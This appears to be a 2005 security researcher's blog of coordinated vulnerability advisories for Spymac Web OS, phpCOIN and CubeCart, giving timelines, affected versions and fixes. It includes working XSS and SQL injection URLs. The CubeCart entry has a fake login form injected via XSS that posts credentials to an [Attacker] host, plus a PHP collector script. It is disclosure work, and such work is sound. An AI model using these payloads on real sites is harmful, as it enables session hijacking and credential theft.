Spymac Web os 3.0 Multiple variable XSS

Sunday, March 13, 2005
#######################################################
Spymac Web os 3.0 Multiple variable XSS
vendor url:http://www.spymac.com/network.php?p=webos&wwg=20
Vendor notified : yes exploit avaible : yes
Original advisore: http://lostmon.blogspot.com/2005/03/
spymac-web-os-30-multiple-variable-xss.html
OSVDB ID:15243,1244,15245,15246,15247,15248,15249,
15250,15251,15252,15253,15254,15255

########################################################

Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending technology
that allows for the creation of an immersive and visually-stunning Web experience.

Spymac flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate some
variables upon submission to some scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between the
browser and the server,leading to a loss of integrity.

############
version afected
############

Spymac Web Os 3.0 beta 190

#########
Solution
#########

The vendor has pached all issues in a fast time :D
I send to him four mails, don´t repose any but
Spymac team working &working for fix...
Good work !!!

##########
timeline
##########

Discovered : 2 Mar 2005
Vendor notifyed: 2 Mar 2005
correct issues: 7 Mar 2005
Disclosure : 14 Mar 2005




############
Examples
############


##################
in index.php :
##################

http://[target]/hosting/index.php?show=[XSS-CODE]
http://[target]/news/index.php?catid=11[XSS-CODE]
http://[target]/news/index.php?contentid=1963[XSS-CODE]

###########
in members:
###########

http://[target]/member.php?memberid=172195[XSS-CODE]

###########
in gallery:
###########

http://[target]/gallery/show_photo.php?picid=321126[XSS-CODE]
http://[target]/gallery/show_pics.php?catid=24502[XSS-CODE]
http://[target]/gallery/show_pics.php?catid=547&split=1[XSS-CODE]
http://[target]/gallery/show_photo.php?picid=359869&nr=1[XSS-CODE]
http://[target]/gallery/upload_picture.php?poll=1[XSS-CODE]

##############
in notes.php :
##############

http://[target]/notes.php?action=outbox[XSS-CODE]
http://[target]/notes.php?action=inbox[XSS-CODE]
http://[target]/notes.php?action=pmform[XSS-CODE]
http://[target]/notes.php?totalPms=0&ppp=12&ppp=20&action=inbox[XSS-code]
http://[target]/notes.php?totalPms=0&ppp=12&ppp=20[XSS-code]&action=inbox
http://[target]/notes.php?totalPms=0&ppp=12[XSS-code]&ppp=20&action=inbox
http://[target]/notes.php?totalPms=0[XSS-code]&ppp=12&ppp=20&action=inbox

##########
in forums
##########

http://[target]/forums/showthread.php?threadid=160053[XSS-CODE]
http://[target]/forums/threadlist.php?catid=708[XSS-CODE]
http://[target]/forums/manager.php?action=myforums[XSS-CODE]
http://[target]/forums/newreply.php?threadid=159939[XSS-CODE]
http://[target]/forums/newpoll.php?catid=&threadid=[XSS-CODE]
http://[target]/forums/newthread.php?catid=&threadid=[XSS-CODE]
http://[target]/forums/manager.php?typ=favs&c=0&ppp=12[XSS-code]
http://[target]/forums/manager.php?typ=favs&c=0[XSS-code]&ppp=12
http://[target]/forums/manager.php?typ=favs[XSS-code]&c=0&ppp=12
http://[target]/forums/manager.php?typ=[XSS-code]favs&c=0&ppp=12
http://[target]/forums/newpoll.php?catid=&threadid=[XSS-code]
http://[target]/forums/newpoll.php?catid=[XSS-code]&threadid=
http://[target]/forums/newthread.php?catid=&threadid=[XSS-code]
http://[target]/forums/newthread.php?catid=[XSS-code]&threadid=

########
Others
########

http://[target]/network.php?p=tos[XSS-CODE]

for exploiting some flaws need to login.(member sections, parts of forums,etc)

atentamente:

Lostmon(lostmon@gmail.com)

Thnx to estrella to be my ligth.
Thnx to all who belibed in me.
Thnx to spymac Team , don´t respond ; but working &working for correct :DDD

Web-blog: http://Lostmon.blogspot.com
--
La curiosidad es lo que hace mover la mente...

phpcoin posible sql injection comands and XSS

Tuesday, March 01, 2005
#############################################
phpcoin posible sql injection commands and XSS
vendor url:http://www.phpcoin.com/
vendor notified : yes exploit avaible:yes
advisore:http://lostmon.blogspot.com/2005/03/
phpcoin-posible-sql-injection-comands.html
last updated 05/03/2005
OSVDB ID:15043,15044,15045,15046,15047,15048....
Secunia: SA14439
Securitytracker:1013329
#############################################


phpCOIN Is a free software package originally designed for web-hosting resellers to handle clients, orders, invoices,
notes and helpdesk, but no longer limited to hosting resellers.
Some variables are not properly validate and permits
sql injection commands and cross-site scripting attacks.

############
sql injection:
############

dislose some sql data...

http://[target]phpcoin/mod.php?mod=siteinfo&id=1'

ummm them ...

http://[target]phpcoin/mod.php?mod=faq
&mode=show&faq_id=2%20or%201=1

http://[target]phpcoin/mod.php?mod=
pages&mode=view&id=25%20or%201=1

http://[target]phpcoin/mod.php?mod=
siteinfo&id=4%20or%201=1

http://[target]phpcoin/mod.php?mod=
articles&mode=list&dtopic_id=1%20or%201=1

http://[target]phpcoin/mod.php?mod=
orders&mode=view&ord_id=1002%20or%201=1

http://[target]phpcoin/mod.php?mod=
domains&mode=view&dom_id=2%20or%201=1

http://[target]phpcoin/mod.php?mod=
invoices&mode=view&invc_id=1002%20or%201=1

for exploiting some flaws need a client or admin login

#################
cross site scripting
#################

http://[target]phpcoin/mod.php?mod=helpdesk&mode=new
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=user&o=login&e=u
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

http://[target]phpcoin/login.php?w=admin&o=login
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

Other script are subceptibles to injection html or javascript code...

##################
versions afected :
##################

1.2.0
1.2.1b
1.2.1

##########
Solution :
##########
no solution was avaible at this time look for vendor information
or for new release versions.

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who belibed in me

Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

######################
updated at 04/03/2005
######################

Today i recive a mail From a person who is worried
for their phpcoin servers, and a mail whith a vendor
respose where , he say ,is working for a fix and give
to me some code for look. Good !!

I decided delete the update post ,for no alarm any people.
any issue found is "critical"... but need to fix ... and
phpcoin vendor is working now for a fix you can look here :

http://forums.phpcoin.com/index.php?showtopic=4116

thnx Karl for your mail :)

#####################
Updated at 05/03/2005
#####################

phpCOIN vendor has released to me version 1.2.2
of phpCOIN i prove all issues and aparently all
now are pached , Good work !!

Solution:

wait for release the version and update your instalation.

phpcoin phpinfo information disclosure

Monday, February 28, 2005
#######################################
phpcoin phpinfo information disclosure
vendor url:http://www.phpcoin.com/
vendor notified : yes exploit avaible:yes
advisore:http://lostmon.blogspot.com
/2005/03/phpcoin-phpinfo-information-disclosure.html
OSVDB ID:14257
#######################################

phpCOIN Is a free software package originally designed for web-hosting resellers to handle clients, orders,invoices,
notes and helpdesk,but no longer limited to hosting resellers.

In a default instalation phpcoin have a file called 'phpinfo.php'
any remote user can call this file and obtain relevant information
about configuration and the server.



versions afected :

1.2.0
1.2.1b
1.2.1

exploit:

http://[target]phpcoin_directory/phpinfo.php

solution :

For phpinfo: after phpcoin isntalation´s delete this file :)

atentamente:
Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to all who belibed in me

--
La curiosidad es lo que hace mover la mente...

CubeCart 2.0.x multiple variable XSS attacks and path disclosure

Friday, February 25, 2005
########################################################
CubeCart 2.0.x multiple variable XSS and path disclosure
vendor: Devellion Limited
vendor url:http://www.cubecart.com
vendorconfirmed :yes exploit avaible: yes
advisore:http://lostmon.blogspot.com/2005/02/
cubecart-20x-multiple-variable-xss.html
vendor solution:http://www.cubecart.com/site/forums/
index.php?showtopic=6032
Related OSVDB iD: 14062 13810 More relatedOSVDB
Secunia:SA14416
Securitytracker:1013304
#########################################################


CubeCart contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate some variables upon submission to some scripts.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server,leading to a loss of integrity.
The 'admin/Settings.inc.php' script is include in all these archives and is this one that fails when validate code was send to the other archives accross of the variables.



##################
variables afected:
##################

cat_id
PHPSESSID
view_doc
product
session
catname
search
page

###########################
posible files XSS afected:
###########################

forgot_pass.php
index.php
login.php
logout.php
new_pass.php
register.php
sale_cat.php
search.php
tellafriend.php
view_doc.php
view_order.php
view_product.php
your_links.php
your_orders.php

##############################
path disclosure Files afected:
##############################

PoC = http://[Target]/path_to_store/cat_navi.php

information.php
language.php
list_docs.php
popular_prod.php
sale.php
subfooter.inc.php
subheader.inc.php
cat_navi.php

###################
versions afected :
###################

2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6 Not affected.


#####################################################
Some proof of comcept ,but have moooore !!!! :/
#####################################################

http://[Target]/path_to_store/?"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?cat_id=1"><script>alert
(document.cookie);</script>

http://[Target]/path_to_store/forgot_pass.php?catname='pruebas1'"><
script>alert(document.cookie);</script>

http://[Target]/path_to_store/index.php?cat_id=5"><body><p>
<h1>CubeCart XSS Pow@ !!!</h1></p>/<body>

http://[Target]/path_to_store/view_order.php?session=1"><script>
alert(document.cookie);</script>

http://[Target]/path_to_store/view_order.php?product=1"><script>alert
(document.cookie);</script>

http://[Target]/path_to_store/your_orders.php?cat_id="><script>
document.write(document.cookie)</script>

http://[Target]/path_to_store/view_product.php?product=1"><script>
alert(document.cookie);</script>

http://[Target]/path_to_store/tellafriend.php?product=1&session="><
script>alert(document.cookie)</script>

http://[Target]/path_to_store/tellafriend.php?product=1"><script>
document.write(document.cookie)</script>

http://[Target]/path_to_store/login.php?session="><script>alert
(document.cookie);</script>




http://[Target]/path_to_store/search.php?search=%22%3E%3Cform%
20action=http://[Attacker]/savedb.php%20method=post%3EUsername:
%3Cinput%20name=username%20type=text%20maxlength=30%3EPassword:
%3Cinput%20name=password%20type=text%20maxlength=30%3E%3Cinput%
20name=Login%20type=submit%20value=Login%3E%3C/form>




http://[Target]/path_to_store/tellafriend.php?product=1%22%3E%
3Cform%20action=http://[Attacker]/savedb.php%20method=post%3E
Username:%3Cinput%20name=username%20type=text%20maxlength=30%3
EPassword:%3Cinput%20name=password%20type=text%20maxlength=30%3
E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form%3E



###########################
foof of concept savedb.php
###########################

<?
$lala = fopen("tostada.txt","a+");
fwrite($lala,"username:".$username."|"."Password:".$password."|");
fclose($lala);
header("Location:http://[target]/path_to_store/login.php");
exit();
?>

#############################

Change the variable for other vulnerable or for other file & variable
so many are vulnerables :P

solution :

1- upgrade to version 2.0.6

1.1- for fixing path disclusure issue ,the Vendor release a fix at
2005-02-21.Cubecart 2.0.6 is not afected ,upgrade your store or aply the fix.

1.2- For fixing most XSS flaws You need to update your store to 2.0.6 and wait for all changes or manual aply the fix.


#################
release time :
#################


discovered : 2005-02-15
vendor notify: 2005-02-15
vendor respose: 2005-02-15
path disclose.fix: 2005-02-21
XSS fix: 2005-02-25
disclosure date: 2005-02-25



atentamente

Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth
Thnx to www.hispanew.com for support
Thnx to cubecart Team ,Good Respose & Good work !!
Thnx To http://www.osvdb.org

blog: http://lostmon.blogspot.com/


--
La curiosidad es lo que hace mover la mente...
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends